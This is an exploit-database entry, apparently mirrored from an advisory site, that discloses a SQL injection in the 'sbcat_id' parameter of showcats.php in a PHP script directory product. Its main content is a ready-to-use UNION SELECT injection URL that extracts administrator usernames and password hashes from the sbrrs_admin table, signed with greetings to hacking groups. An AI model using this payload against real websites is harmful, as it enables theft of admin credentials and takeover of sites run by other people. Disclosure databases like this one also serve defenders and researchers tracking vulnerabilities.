PHP Script Directory Software - 'sbcat_id' SQL Injection

🗓️ 28 Jan 2011 00:00:00Reported by h4ck3rType

PHP Script Directory Software - 'sbcat_id' SQL Injection. Vulnerability in showcats.php allows attackers to execute SQL injection. Contact h4ck3r at [email protected]

==
Author: BorN To K!LL - h4ck3r
Contact: [email protected]
==
Script: PHP script directory software
Version: n/a
Link: http://www.softbizsolutions.com/script-directory-software.php
==
3xploit:
[path]/showcats.php?sbcat_id=[SQL-Injection]

3xample:
[path]/showcats.php?sbcat_id=-9999+union+all+select+1,concat(sbadmin_name,0x3a,sbadmin_pwd),3,4,5+from+sbrrs_admin--

==
Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==

28 Jan 2011 00:00Current

7.4High risk

Vulners AI Score7.4

PHP Script Directory Software - &#039;sbcat_id&#039; SQL Injection

PHP Script Directory Software - 'sbcat_id' SQL Injection